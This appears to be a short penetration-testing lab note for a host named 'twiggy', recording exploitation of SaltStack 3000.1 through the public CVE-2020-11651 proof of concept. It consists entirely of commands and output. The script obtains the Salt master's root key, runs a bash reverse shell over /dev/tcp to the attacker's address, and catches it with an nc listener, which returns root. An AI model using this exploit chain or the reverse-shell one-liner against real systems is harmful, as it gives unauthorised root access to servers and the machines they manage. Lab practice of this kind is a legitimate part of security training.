4 :4506 SaltStack 3000.1

Using https://github.com/jasperla/CVE-2020-11651-poc
# python3 -m pip install salt

$ python3 exploit.py --master 192.168.246.62
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (192.168.246.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: 5u3LOWydLI0nuQQVb7ylzbEKeWTZvhaLeT0w9RTHBYtq6lq0stud6KdzDTJa9WtWXOQzF27Bg1s=

$ python3 exploit.py --master 192.168.246.62 --exec "bash -i >& /dev/tcp/192.168.49.246/8000 0>&1"
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (192.168.246.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: 5u3LOWydLI0nuQQVb7ylzbEKeWTZvhaLeT0w9RTHBYtq6lq0stud6KdzDTJa9WtWXOQzF27Bg1s=
[+] Attemping to execute bash -i >& /dev/tcp/192.168.49.246/8000 0>&1 on 192.168.246.62
[+] Successfully scheduled job: 20210907064003509671

$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.49.246] from (UNKNOWN) [192.168.246.62] 53880
bash: no job control in this shell
[root@twiggy root]# whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
root
uid=0(root) gid=0(root) groups=0(root)
twiggy
Linux twiggy 3.10.0-1127.8.2.el7.x86_64 #1 SMP Tue May 12 16:57:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux